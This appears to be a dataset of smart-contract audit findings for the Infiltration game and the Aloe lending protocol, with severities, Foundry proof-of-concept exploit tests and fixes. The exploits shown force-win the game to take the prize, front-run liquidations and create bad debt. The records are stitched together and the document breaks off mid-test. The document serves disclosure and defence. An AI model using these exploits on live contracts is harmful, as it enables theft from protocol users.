Check woundedAt at `_killWoundedAgents`\\n```\\n function _killWoundedAgents(\\n uint256 roundId,\\n uint256 currentRoundAgentsAlive\\n ) private returns (uint256 deadAgentsCount) {\\n // rest of code\\n for (uint256 i; i < woundedAgentIdsCount; ) {\\n uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n uint256 index = agentIndex(woundedAgentId);\\n// Remove the line below\\n if (agents[index].status == AgentStatus.Wounded) {\\n// Add the line below\\n if (agents[index].status == AgentStatus.Wounded && agents[index].woundedAt == roundId) {\\n // rest of code\\n }\\n\\n // rest of code\\n }\\n\\n emit Killed(roundId, woundedAgentIds);\\n }\\n```\\n
The user pays tokens to keep the agent alive, but the agent will die even if it was successfully healed. The user loses the tokens and is forced out of the game.
```\\n function _killWoundedAgents(\\n uint256 roundId,\\n uint256 currentRoundAgentsAlive\\n ) private returns (uint256 deadAgentsCount) {\\n // rest of code\\n for (uint256 i; i < woundedAgentIdsCount; ) {\\n uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n uint256 index = agentIndex(woundedAgentId);\\n if (agents[index].status == AgentStatus.Wounded) {\\n // rest of code\\n }\\n\\n // rest of code\\n }\\n\\n emit Killed(roundId, woundedAgentIds);\\n }\\n```\\n
Attacker can steal reward of actual winner by force ending the game
high
Currently the following scenario is possible: an attacker owns some lower-index agents and some higher-index agents, and a normal user owns one agent with an index between the attacker's agents. If one of the attacker's agents with a lower index gets wounded, he can escape all other agents and will instantly win the game, even if the other user still has one active agent.\\nThis is possible because the winner is determined by the agent index, and escaping all agents at once won't kill the wounded agent because the game instantly ends.\\nThe following check inside startNewRound prevents killing of wounded agents by starting a new round:\\n```\\nuint256 activeAgents = gameInfo.activeAgents;\\n        if (activeAgents == 1) {\\n            revert GameOver();\\n        }\\n```\\n\\nThe following check inside claimPrize pays the prize to the first-ID agent:\\n```\\nuint256 agentId = agents[1].agentId;\\n_assertAgentOwnership(agentId);\\n```\\n\\nSee the following POC:\\nPOC\\nPut this into Infiltration.mint.t.sol and run `forge test --match-test forceWin -vvv`\\n```\\nfunction test_forceWin() public {\\n        address attacker = address(1337);\\n\\n        //prefund attacker and user1\\n        vm.deal(user1, PRICE * MAX_MINT_PER_ADDRESS);\\n        vm.deal(attacker, PRICE * MAX_MINT_PER_ADDRESS);\\n\\n        // MINT some agents\\n        vm.warp(_mintStart());\\n        // attacker wants to make sure he owns a bunch of agents with low IDs!!\\n        vm.prank(attacker);\\n        infiltration.mint{value: PRICE * 30}({quantity: 30});\\n        // For simplicity we mint only 1 agent to user 1 here, but it could be more, they could get wounded, etc.\\n        vm.prank(user1);\\n        infiltration.mint{value: PRICE *1}({quantity: 1});\\n        //Attacker also wants a bunch of agents with the highest IDs, as they are getting swapped with the killed agents (move forward)\\n        vm.prank(attacker);\\n        infiltration.mint{value: PRICE * 30}({quantity: 30});\\n        \\n        vm.warp(_mintEnd());\\n\\n        //start the game\\n        vm.prank(owner);\\n        infiltration.startGame();\\n\\n        
vm.prank(VRF_COORDINATOR);\\n uint256[] memory randomWords = new uint256[](1);\\n randomWords[0] = 69_420;\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(_computeVrfRequestId(1), randomWords);\\n // Now we are in round 2 we do have 1 wounded agent (but we can imagine any of our agent got wounded, doesn´t really matter)\\n \\n // we know with our HARDCODED RANDOMNESS THAT AGENT 3 gets wounded!!\\n\\n // Whenever we get in a situation, that we own all active agents, but 1 and our agent has a lower index we can instant win the game!!\\n // This is done by escaping all agents, at once, except the lowest index\\n uint256[] memory escapeIds = new uint256[](59);\\n escapeIds[0] = 1;\\n escapeIds[1] = 2;\\n uint256 i = 4; //Scipping our wounded AGENT 3\\n for(; i < 31;) {\\n escapeIds[i-2] = i;\\n unchecked {++i;}\\n }\\n //skipping 31 as this owned by user1\\n unchecked {++i;}\\n for(; i < 62;) {\\n escapeIds[i-3] = i;\\n unchecked {++i;}\\n }\\n vm.prank(attacker);\\n infiltration.escape(escapeIds);\\n\\n (uint16 activeAgents, uint16 woundedAgents, , uint16 deadAgents, , , , , , , ) = infiltration.gameInfo();\\n console.log("Active", activeAgents);\\n assertEq(activeAgents, 1);\\n // This will end the game instantly.\\n //owner should not be able to start new round\\n vm.roll(block.number + BLOCKS_PER_ROUND);\\n vm.prank(owner);\\n vm.expectRevert();\\n infiltration.startNewRound();\\n\\n //Okay so the game is over, makes sense!\\n // Now user1 has the only active AGENT, so he should claim the grand prize!\\n // BUT user1 cannot\\n vm.expectRevert(IInfiltration.NotAgentOwner.selector);\\n vm.prank(user1);\\n infiltration.claimGrandPrize();\\n\\n //instead the attacker can:\\n vm.prank(attacker);\\n infiltration.claimGrandPrize();\\n \\n```\\n
Start a new round before the real end of the game to clear all wounded agents and reorder IDs.
An attacker can steal the grand prize of the actual winner by force-ending the game through escapes.\\nThis also introduces problems if there are other players with wounded agents but lower (< 50) token IDs: they can claim prizes for wounded agents, which will break parts of the game logic.
```\\nuint256 activeAgents = gameInfo.activeAgents;\\n if (activeAgents == 1) {\\n revert GameOver();\\n }\\n```\\n
Agents with a healing opportunity will be terminated directly if `escape` reduces activeAgents to `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS` or fewer
medium
In each round, agents have the opportunity to either `escape` or `heal` before the `_requestForRandomness` function is called. However, the order of execution between these two functions is not specified, and either one can be executed at any time just before `startNewRound`. Typically, this isn't an issue. However, the problem arises when there are only a few Active Agents left in the game.\\nOn one hand, the `heal` function requires that the number of `gameInfo.activeAgents` is greater than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`.\\n```\\n    function heal(uint256[] calldata agentIds) external nonReentrant {\\n        _assertFrontrunLockIsOff();\\n//@audit If there are not enough activeAgents, heal is disabled\\n        if (gameInfo.activeAgents <= NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n            revert HealingDisabled();\\n        }\\n```\\n\\nOn the other hand, the `escape` function will directly set the status of agents to "ESCAPE" and reduce the count of `gameInfo.activeAgents`.\\n```\\n    function escape(uint256[] calldata agentIds) external nonReentrant {\\n        _assertFrontrunLockIsOff();\\n\\n        uint256 agentIdsCount = agentIds.length;\\n        _assertNotEmptyAgentIdsArrayProvided(agentIdsCount);\\n\\n        uint256 activeAgents = gameInfo.activeAgents;\\n        uint256 activeAgentsAfterEscape = activeAgents - agentIdsCount;\\n        _assertGameIsNotOverAfterEscape(activeAgentsAfterEscape);\\n\\n        uint256 currentRoundAgentsAlive = agentsAlive();\\n\\n        uint256 prizePool = gameInfo.prizePool;\\n        uint256 secondaryPrizePool = gameInfo.secondaryPrizePool;\\n        uint256 reward;\\n        uint256[] memory rewards = new uint256[](agentIdsCount);\\n\\n        for (uint256 i; i < agentIdsCount; ) {\\n            uint256 agentId = agentIds[i];\\n            _assertAgentOwnership(agentId);\\n\\n            uint256 index = agentIndex(agentId);\\n            _assertAgentStatus(agents[index], agentId, AgentStatus.Active);\\n\\n            uint256 totalEscapeValue = prizePool / currentRoundAgentsAlive;\\n            uint256 rewardForPlayer = (totalEscapeValue * _escapeMultiplier(currentRoundAgentsAlive)) /\\n                
ONE_HUNDRED_PERCENT_IN_BASIS_POINTS;\\n            rewards[i] = rewardForPlayer;\\n            reward += rewardForPlayer;\\n\\n            uint256 rewardToSecondaryPrizePool = (totalEscapeValue.unsafeSubtract(rewardForPlayer) *\\n                _escapeRewardSplitForSecondaryPrizePool(currentRoundAgentsAlive)) / ONE_HUNDRED_PERCENT_IN_BASIS_POINTS;\\n\\n            unchecked {\\n                prizePool = prizePool - rewardForPlayer - rewardToSecondaryPrizePool;\\n            }\\n            secondaryPrizePool += rewardToSecondaryPrizePool;\\n\\n            _swap({\\n                currentAgentIndex: index,\\n                lastAgentIndex: currentRoundAgentsAlive,\\n                agentId: agentId,\\n                newStatus: AgentStatus.Escaped\\n            });\\n\\n            unchecked {\\n                --currentRoundAgentsAlive;\\n                ++i;\\n            }\\n        }\\n\\n        // This is equivalent to\\n        // unchecked {\\n        //     gameInfo.activeAgents = uint16(activeAgentsAfterEscape);\\n        //     gameInfo.escapedAgents += uint16(agentIdsCount);\\n        // }\\n```\\n\\nTherefore, if the `heal` function is invoked first, the corresponding Wounded Agents will be healed in `fulfillRandomWords`. If the `escape` function is invoked first and the number of `gameInfo.activeAgents` becomes equal to or less than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`, the `heal` function will be disabled. This obviously violates the fairness of the game.\\nExample\\nConsider the following situation:\\nAfter Round N, there are 100 agents alive, of which 1 Active Agent wants to `escape` and 10 Wounded Agents want to `heal`.\\nRound N:\\nActive Agents: 51\\nWounded Agents: 49\\nHealing Agents: 0\\nAccording to the order of execution, there are two situations. Please note that the result is calculated only after `_healRequestFulfilled`, so there are no new wounded or dead agents.\\nFirst, invoking `escape` before `heal`: `heal` is disabled and all Wounded Agents are killed because there are not enough Active Agents.\\nRound N+1:\\nActive Agents: 50\\nWounded Agents: 0\\nHealing Agents: 0\\nSecond, invoking `heal` before `escape`. 
Suppose that `heal` saves 5 agents; then we get:\\nRound N+1:\\nActive Agents: 55\\nWounded Agents: 39\\nHealing Agents: 0\\nObviously, different execution orders lead to drastically different outcomes, which affects the fairness of the game.
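The ordering dependence reduces to a single threshold comparison. A rough Python sketch, assuming `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS = 50` (a hypothetical value inferred from the 51-active-agents example above):

```python
WINNERS = 50

def heal_allowed(active_agents):
    # mirrors the heal() guard: activeAgents must exceed the winner count
    return active_agents > WINNERS

active = 51
# escape first: 51 - 1 = 50 active agents, healing is disabled and all
# 49 wounded agents will be killed
print(heal_allowed(active - 1))   # False
# heal first: 51 active agents, healing is still allowed
print(heal_allowed(active))       # True
```

A single escape transaction front-running the heals flips the guard, which is why the report recommends fixing the ordering per round.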
It is advisable to ensure that the `escape` function is always called after the `heal` function in every round. This guarantees that every wounded agent has the opportunity to `heal` themselves when there are a sufficient number of `activeAgents` at the start of each round. This approach can enhance fairness and gameplay balance.
If some Active Agents choose to escape, causing the count of `activeAgents` to become equal to or less than `NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS`, the Wounded Agents will lose their final chance to heal themselves.\\nThis situation can significantly impact the game's fairness. The Wounded Agents would have otherwise had the opportunity to heal themselves and continue participating in the game. However, the escape of other agents leads to their immediate termination, depriving them of that chance.
```\\n function heal(uint256[] calldata agentIds) external nonReentrant {\\n _assertFrontrunLockIsOff();\\n//@audit If there are not enough activeAgents, heal is disabled\\n if (gameInfo.activeAgents <= NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n revert HealingDisabled();\\n }\\n```\\n
Wounded agent can't invoke heal in the next round
medium
Assume players are marked as wounded in round `12`; they cannot invoke `heal` in the next round, 13.\\n```\\n function test_heal_in_next_round_v1() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(11);\\n\\n\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 12});\\n\\n address agentOwner = _ownerOf(woundedAgentIds[0]);\\n looks.mint(agentOwner, HEAL_BASE_COST);\\n\\n vm.startPrank(agentOwner);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, HEAL_BASE_COST);\\n\\n uint256[] memory agentIds = new uint256[](1);\\n agentIds[0] = woundedAgentIds[0];\\n\\n uint256[] memory costs = new uint256[](1);\\n costs[0] = HEAL_BASE_COST;\\n\\n //get gameInfo\\n (,,,,,uint40 currentRoundId,,,,,) = infiltration.gameInfo();\\n assert(currentRoundId == 13);\\n\\n //get agent Info\\n IInfiltration.Agent memory agentInfo = infiltration.getAgent(woundedAgentIds[0]);\\n assert(agentInfo.woundedAt == 12);\\n\\n //agent can't invoke heal in the next round.\\n vm.expectRevert(IInfiltration.HealingMustWaitAtLeastOneRound.selector);\\n infiltration.heal(agentIds);\\n }\\n```\\n
```\\n // No need to check if the heal deadline has passed as the agent would be killed\\n unchecked {\\n- if (currentRoundId - woundedAt < 2) {\\n+ if (currentRoundId - woundedAt < 1) {\\n revert HealingMustWaitAtLeastOneRound();\\n }\\n }\\n```\\n
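A quick sanity check of the proposed change (illustrative Python): with the original `< 2` check an agent wounded in round 12 cannot heal in round 13, while the suggested `< 1` check allows it:

```python
# Both functions return True when healing is permitted (i.e. no revert).
def healing_allowed_original(current_round_id, wounded_at):
    return not (current_round_id - wounded_at < 2)

def healing_allowed_fixed(current_round_id, wounded_at):
    return not (current_round_id - wounded_at < 1)

# agent wounded in round 12, current round is 13
assert not healing_allowed_original(13, 12)  # reverts: HealingMustWaitAtLeastOneRound
assert healing_allowed_fixed(13, 12)         # next-round healing is possible
```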
Users have to wait for one more round, which reduces the odds for an Agent to heal successfully from 99% at Round 1 to 98% at Round 2.
```\\n function test_heal_in_next_round_v1() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(11);\\n\\n\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 12});\\n\\n address agentOwner = _ownerOf(woundedAgentIds[0]);\\n looks.mint(agentOwner, HEAL_BASE_COST);\\n\\n vm.startPrank(agentOwner);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, HEAL_BASE_COST);\\n\\n uint256[] memory agentIds = new uint256[](1);\\n agentIds[0] = woundedAgentIds[0];\\n\\n uint256[] memory costs = new uint256[](1);\\n costs[0] = HEAL_BASE_COST;\\n\\n //get gameInfo\\n (,,,,,uint40 currentRoundId,,,,,) = infiltration.gameInfo();\\n assert(currentRoundId == 13);\\n\\n //get agent Info\\n IInfiltration.Agent memory agentInfo = infiltration.getAgent(woundedAgentIds[0]);\\n assert(agentInfo.woundedAt == 12);\\n\\n //agent can't invoke heal in the next round.\\n vm.expectRevert(IInfiltration.HealingMustWaitAtLeastOneRound.selector);\\n infiltration.heal(agentIds);\\n }\\n```\\n
fulfillRandomWords() could revert under certain circumstances
medium
A crucial part of my POC is the variable AGENTS_TO_WOUND_PER_ROUND_IN_BASIS_POINTS. The protocol's team communicated that they plan to set it to 20 initially, but it is possible for it to have a different value in the future. For the POC I used 30.\\n```\\nfunction test_fulfillRandomWords_revert() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(48);\\n \\n uint256 counter = 0;\\n uint256[] memory wa = new uint256[](30);\\n uint256 totalCost = 0;\\n\\n for (uint256 j=2; j <= 6; j++) \\n {\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: j});\\n\\n uint256[] memory costs = new uint256[](woundedAgentIds.length);\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n costs[i] = HEAL_BASE_COST;\\n wa[counter] = woundedAgentIds[i];\\n counter++;\\n if(counter > 29) break;\\n }\\n\\n if(counter > 29) break;\\n }\\n \\n \\n totalCost = HEAL_BASE_COST * wa.length;\\n looks.mint(user1, totalCost);\\n\\n vm.startPrank(user1);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, totalCost);\\n\\n\\n infiltration.heal(wa);\\n vm.stopPrank();\\n\\n _drawXRounds(1);\\n }\\n```\\n\\nI put this test into Infiltration.startNewRound.t.sol and used --gas-report to see that the gas used for fulfillRandomWords exceeds 2 500 000.
A couple of ideas :\\nYou can limit the value of AGENTS_TO_WOUND_PER_ROUND_IN_BASIS_POINTS to a small enough number so that it is 100% sure it will not reach the gas limit.\\nConsider simply storing the randomness and taking more complex follow-on actions in separate contract calls as stated in the "Security Considerations" section of the VRF's docs.
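The second recommendation can be sketched as follows (illustrative Python model, not the contract): the VRF callback only stores the random word, and the expensive follow-on processing moves to a separate call that can be retried or chunked without risking the callback gas cap:

```python
class GameMock:
    """Toy model of the store-then-process pattern from the VRF docs."""

    def __init__(self):
        self.pending = {}       # requestId -> stored random word
        self.processed = set()

    def fulfill_random_words(self, request_id, word):
        # cheap: only a storage write, so the VRF callback cannot exceed the gas cap
        self.pending[request_id] = word

    def process_round(self, request_id):
        # expensive wounding/healing logic would run here, possibly in chunks
        word = self.pending.pop(request_id)
        self.processed.add(request_id)
        return word

game = GameMock()
game.fulfill_random_words(1, 0xDEADBEEF)
assert game.process_round(1) == 0xDEADBEEF
assert 1 in game.processed
```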
DOS of the protocol and inability to continue the game.
```\\nfunction test_fulfillRandomWords_revert() public {\\n _startGameAndDrawOneRound();\\n\\n _drawXRounds(48);\\n \\n uint256 counter = 0;\\n uint256[] memory wa = new uint256[](30);\\n uint256 totalCost = 0;\\n\\n for (uint256 j=2; j <= 6; j++) \\n {\\n (uint256[] memory woundedAgentIds, ) = infiltration.getRoundInfo({roundId: j});\\n\\n uint256[] memory costs = new uint256[](woundedAgentIds.length);\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n costs[i] = HEAL_BASE_COST;\\n wa[counter] = woundedAgentIds[i];\\n counter++;\\n if(counter > 29) break;\\n }\\n\\n if(counter > 29) break;\\n }\\n \\n \\n totalCost = HEAL_BASE_COST * wa.length;\\n looks.mint(user1, totalCost);\\n\\n vm.startPrank(user1);\\n _grantLooksApprovals();\\n looks.approve(TRANSFER_MANAGER, totalCost);\\n\\n\\n infiltration.heal(wa);\\n vm.stopPrank();\\n\\n _drawXRounds(1);\\n }\\n```\\n
Oracle.sol: manipulation via increasing Uniswap V3 pool observationCardinality
high
The `Oracle.consult` function takes a `uint40 seed` parameter and can be used in either of two ways:\\nSet the highest 8 bit to a non-zero value to use Uniswap V3's binary search to get observations\\nSet the highest 8 bit to zero and use the lower 32 bits to provide hints and use the more efficient internal `Oracle.observe` function to get the observations\\nThe code for Aloe's `Oracle.observe` function is adapted from Uniswap V3's Oracle library.\\nTo understand this issue it is necessary to understand Uniswap V3's `observationCardinality` concept.\\nA deep dive can be found here.\\nIn short, it is a circular array of variable size. The size of the array can be increased by ANYONE via calling `Pool.increaseObservationCardinalityNext`.\\nThe Uniswap V3 `Oracle.write` function will then take care of actually expanding the array once the current index has reached the end of the array.\\nAs can be seen in this function, uninitialized entries in the array have their timestamp set to `1`.\\nAnd all other values in the observation struct (array element) are set to zero:\\n```\\nstruct Observation {\\n // the block timestamp of the observation\\n uint32 blockTimestamp;\\n // the tick accumulator, i.e. tick * time elapsed since the pool was first initialized\\n int56 tickCumulative;\\n // the seconds per liquidity, i.e. seconds elapsed / max(1, liquidity) since the pool was first initialized\\n uint160 secondsPerLiquidityCumulativeX128;\\n // whether or not the observation is initialized\\n bool initialized;\\n}\\n```\\n\\nHere's an example for a simplified array to illustrate how the Aloe `Oracle.observe` function might read an invalid value:\\n```\\nAssume we are looking for the target=10 timestamp.\\n\\nAnd the observations array looks like this (element values are timestamps):\\n\\n| 12 | 20 | 25 | 30 | 1 | 1 | 1 |\\n\\nThe length of the array is 7.\\n\\nLet's say we provide the index 6 as the seed and the current observationIndex is 3 (i.e. 
pointing to timestamp 30)\\n\\nThe Oracle.observe function then chooses 1 as the left timestamp and 12 as the right timestamp.\\n\\nThis means the invalid and uninitialized element at index 6 with timestamp 1 will be used to calculate the Oracle values.\\n```\\n\\nHere is the section of the `Oracle.observe` function where the invalid element is used to calculate the result.\\nBy updating the observations (e.g. via swaps in the Uniswap pool), an attacker can influence the value that is written on the left of the array, i.e. he can arrange for a scenario such that he can make the Aloe `Oracle` read a wrong value.\\nUpstream this causes the Aloe `Oracle` to continue its calculation with `tickCumulatives` and `secondsPerLiquidityCumulativeX128s` having corrupted values. Either `secondsPerLiquidityCumulativeX128s[0]`, `tickCumulatives[0]` AND `secondsPerLiquidityCumulativeX128s[1]`, `tickCumulatives[1]` or only `secondsPerLiquidityCumulativeX128s[0]`, `tickCumulatives[0]` are assigned invalid values (depending on what the timestamp on the left of the array is).
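The array walk-through above can be modeled directly (illustrative Python; timestamps are taken from the example):

```python
# Circular observation buffer after cardinality was grown to 7: the three
# expanded slots are uninitialized and carry the sentinel timestamp 1.
observations = [
    {"ts": 12, "init": True},
    {"ts": 20, "init": True},
    {"ts": 25, "init": True},
    {"ts": 30, "init": True},   # current observationIndex = 3
    {"ts": 1,  "init": False},  # written by increaseObservationCardinalityNext
    {"ts": 1,  "init": False},
    {"ts": 1,  "init": False},
]

def surrounding(seed):
    # naive seeded lookup that does NOT check `init` (the bug described above)
    n = len(observations)
    return observations[seed % n], observations[(seed + 1) % n]

left, right = surrounding(6)                  # attacker-chosen seed
assert left["ts"] == 1 and not left["init"]   # uninitialized slot used as left bound
assert right["ts"] == 12                      # wraps around to the oldest real entry
```

Skipping entries with `init == False`, as the recommendation suggests, would prevent the sentinel slot from ever bounding the target.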
The `Oracle.observe` function must not consider observations as valid that have not been initialized.\\nThis means the `initialized` field must be queried here and here and must be skipped over.
The corrupted values are then used in the further calculations in `Oracle.consult`, which reports its results upstream to `VolatilityOracle.update` and `VolatilityOracle.consult`, making their way into the core application.\\nThe TWAP price can be inflated such that bad debt can be taken on due to inflated valuation of Uniswap V3 liquidity.\\nBesides that, there are virtually endless possibilities for an attacker to exploit this scenario since the Oracle is at the very heart of the Aloe application and it's impossible to foresee all the permutations of values that a determined attacker may use.\\nE.g. the TWAP price is used for liquidations where an incorrect TWAP price can lead to profit. If the protocol expects you to exchange 1 BTC for 10k USDC, then you end up with ~20k profit.\\nSince an attacker can make this scenario occur on purpose by updating the Uniswap observations (e.g. by executing swaps) and increasing the observation cardinality, the severity of this finding is "High".
```\\nstruct Observation {\\n // the block timestamp of the observation\\n uint32 blockTimestamp;\\n // the tick accumulator, i.e. tick * time elapsed since the pool was first initialized\\n int56 tickCumulative;\\n // the seconds per liquidity, i.e. seconds elapsed / max(1, liquidity) since the pool was first initialized\\n uint160 secondsPerLiquidityCumulativeX128;\\n // whether or not the observation is initialized\\n bool initialized;\\n}\\n```\\n
It is possible to frontrun liquidations with self liquidation with high strain value to clear warning and keep unhealthy positions from liquidation
high
`Borrower.warn` sets the time when the liquidation (involving swap) can happen:\\n```\\nslot0 = slot0_ | ((block.timestamp + LIQUIDATION_GRACE_PERIOD) << 208);\\n```\\n\\nBut `Borrower.liquidate` clears the warning regardless of whether the account is healthy or not after the repayment:\\n```\\n_repay(repayable0, repayable1);\\nslot0 = (slot0_ & SLOT0_MASK_POSITIONS) | SLOT0_DIRT;\\n```\\n\\nThe scenario above is demonstrated in the test, add this to Liquidator.t.sol:\\n```\\nfunction test_liquidationFrontrun() public {\\n uint256 margin0 = 1595e18;\\n uint256 margin1 = 0;\\n uint256 borrows0 = 0;\\n uint256 borrows1 = 1e18 * 100;\\n\\n // Extra due to rounding up in liabilities\\n margin0 += 1;\\n\\n deal(address(asset0), address(account), margin0);\\n deal(address(asset1), address(account), margin1);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, borrows1);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(lender1.borrowBalance(address(account)), borrows1);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n assertEq(asset1.balanceOf(address(account)), borrows1 + margin1);\\n\\n _setInterest(lender0, 10100);\\n _setInterest(lender1, 10100);\\n\\n account.warn((1 << 32));\\n\\n uint40 unleashLiquidationTime = uint40((account.slot0() >> 208) % (1 << 40));\\n assertEq(unleashLiquidationTime, block.timestamp + LIQUIDATION_GRACE_PERIOD);\\n\\n skip(LIQUIDATION_GRACE_PERIOD + 1);\\n\\n // listen for liquidation, or be the 1st in the block when warning is cleared\\n // liquidate with very high strain, basically keeping the position, but clearing the warning\\n account.liquidate(this, bytes(""), 1e10, (1 << 32));\\n\\n unleashLiquidationTime = uint40((account.slot0() >> 208) % (1 << 40));\\n assertEq(unleashLiquidationTime, 0);\\n\\n // the liquidation command we've frontrun will now revert (due to warning not set: "Aloe: grace")\\n vm.expectRevert();\\n
account.liquidate(this, bytes(""), 1, (1 << 32));\\n}\\n```\\n
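The bit-packing in play can be sketched as follows (illustrative Python; the mask and flag constants are assumptions, only the bit positions match the snippets above):

```python
LIQUIDATION_GRACE_PERIOD = 2 * 60 * 60   # assumed duration, for illustration only
SLOT0_MASK_POSITIONS = (1 << 208) - 1    # assumed: keeps only the position bits
SLOT0_DIRT = 1 << 255                    # placeholder flag bit

now = 1_700_000_000
slot0 = (now + LIQUIDATION_GRACE_PERIOD) << 208            # warn(): arm the timer

unleash = (slot0 >> 208) % (1 << 40)
assert unleash == now + LIQUIDATION_GRACE_PERIOD

# liquidate() wipes bits 208+ unconditionally, even for a high-strain no-op call
slot0 = (slot0 & SLOT0_MASK_POSITIONS) | SLOT0_DIRT
assert (slot0 >> 208) % (1 << 40) == 0                     # warning cleared
```

This is why a strain-1e10 "liquidation" that repays almost nothing still resets the unleash time to zero, forcing real liquidators back through `warn` and the grace period.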
Consider clearing "warn" status only if account is healthy after liquidation.
A very important protocol function (liquidation) can be DOS'ed, allowing unhealthy accounts to avoid liquidation for a very long time. Malicious users can thus open huge risky positions which will then go into bad debt, causing loss of funds for all protocol users as they will not be able to withdraw their funds. This can cause a bank run - the first users will be able to withdraw, but later users won't, as the protocol won't have enough funds left.
```\\nslot0 = slot0_ | ((block.timestamp + LIQUIDATION_GRACE_PERIOD) << 208);\\n```\\n
`Borrower`'s `modify`, `liquidate` and `warn` functions use stored (outdated) account liabilities which makes it possible for the user to intentionally put him into bad debt in 1 transaction
high
Possible scenario for the intentional creation of bad debt:\\nBorrow max amount at max leverage + some safety margin so that position is healthy for the next few days, for example borrow 10000 DAI, add margin of 1051 DAI for safety (51 DAI required for `MAX_LEVERAGE`, 1000 DAI safety margin)\\nWait for a long period of market inactivity (such as 1 day).\\nAt this point `borrowBalance` is greater than `borrowBalanceStored` by a value higher than `MAX_LEVERAGE` (example: `borrowBalance` = 10630 DAI, `borrowBalanceStored` = 10000 DAI)\\nCall `modify` and withdraw max possible amount (based on borrowBalanceStored), for example, withdraw 1000 DAI (remaining assets = 10051 DAI, which is healthy based on stored balance of 10000 DAI, but in fact this is already a bad debt, because borrow balance is 10630, which is more than remaining assets). This works, because liabilities used are outdated.\\nAt this point the user is already in bad debt, but due to points 1-2, it's still not liquidatable. After calling `Lender.accrueInterest` the account can be liquidated. 
This bad debt is the funds lost by the other users.\\nThis scenario is not profitable to the malicious user, but can be modified to make it profitable: the user can deposit a large amount to the lender before these steps, meaning the inflated interest rate will be accrued by the user's deposit to the lender, but it will not be paid by the user due to bad debt (the user will deposit 1051 DAI, withdraw 1000 DAI, and gain some share of the accrued 630 DAI; for example if he doubles the lender's TVL, he will gain 315 DAI - protocol fees).\\nThe scenario above is demonstrated in the test, create test/Exploit.t.sol:\\n```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.17;\\n\\nimport "forge-std/Test.sol";\\n\\nimport {MAX_RATE, DEFAULT_ANTE, DEFAULT_N_SIGMA, LIQUIDATION_INCENTIVE} from "src/libraries/constants/Constants.sol";\\nimport {Q96} from "src/libraries/constants/Q.sol";\\nimport {zip} from "src/libraries/Positions.sol";\\n\\nimport "src/Borrower.sol";\\nimport "src/Factory.sol";\\nimport "src/Lender.sol";\\nimport "src/RateModel.sol";\\n\\nimport {FatFactory, VolatilityOracleMock} from "./Utils.sol";\\n\\ncontract RateModelMax is IRateModel {\\n uint256 private constant _A = 6.1010463348e20;\\n\\n uint256 private constant _B = _A / 1e18;\\n\\n /// @inheritdoc IRateModel\\n function getYieldPerSecond(uint256 utilization, address) external pure returns (uint256) {\\n unchecked {\\n return (utilization < 0.99e18) ?
_A / (1e18 - utilization) - _B : MAX_RATE;\\n }\\n }\\n}\\n\\ncontract ExploitTest is Test, IManager, ILiquidator {\\n IUniswapV3Pool constant pool = IUniswapV3Pool(0xC2e9F25Be6257c210d7Adf0D4Cd6E3E881ba25f8);\\n ERC20 constant asset0 = ERC20(0x6B175474E89094C44Da98b954EedeAC495271d0F);\\n ERC20 constant asset1 = ERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);\\n\\n Lender immutable lender0;\\n Lender immutable lender1;\\n Borrower immutable account;\\n\\n constructor() {\\n vm.createSelectFork(vm.rpcUrl("mainnet"));\\n vm.rollFork(15_348_451);\\n\\n Factory factory = new FatFactory(\\n address(0),\\n address(0),\\n VolatilityOracle(address(new VolatilityOracleMock())),\\n new RateModelMax()\\n );\\n\\n factory.createMarket(pool);\\n (lender0, lender1, ) = factory.getMarket(pool);\\n account = factory.createBorrower(pool, address(this), bytes12(0));\\n }\\n\\n function setUp() public {\\n // deal to lender and deposit (so that there are assets to borrow)\\n deal(address(asset0), address(lender0), 10000e18); // DAI\\n deal(address(asset1), address(lender1), 10000e18); // WETH\\n lender0.deposit(10000e18, address(12345));\\n lender1.deposit(10000e18, address(12345));\\n\\n deal(address(account), DEFAULT_ANTE + 1);\\n }\\n\\n function test_selfLiquidation() public {\\n\\n // malicious user borrows at max leverage + some safety margin\\n uint256 margin0 = 51e18 + 1000e18;\\n uint256 borrows0 = 10000e18;\\n\\n deal(address(asset0), address(account), margin0);\\n\\n bytes memory data = abi.encode(Action.BORROW, borrows0, 0);\\n account.modify(this, data, (1 << 32));\\n\\n assertEq(lender0.borrowBalance(address(account)), borrows0);\\n assertEq(asset0.balanceOf(address(account)), borrows0 + margin0);\\n\\n // skip 1 day (without transactions)\\n skip(86400);\\n\\n emit log_named_uint("User borrow:", lender0.borrowBalance(address(account)));\\n emit log_named_uint("User stored borrow:", lender0.borrowBalanceStored(address(account)));\\n\\n // withdraw all the "extra" 
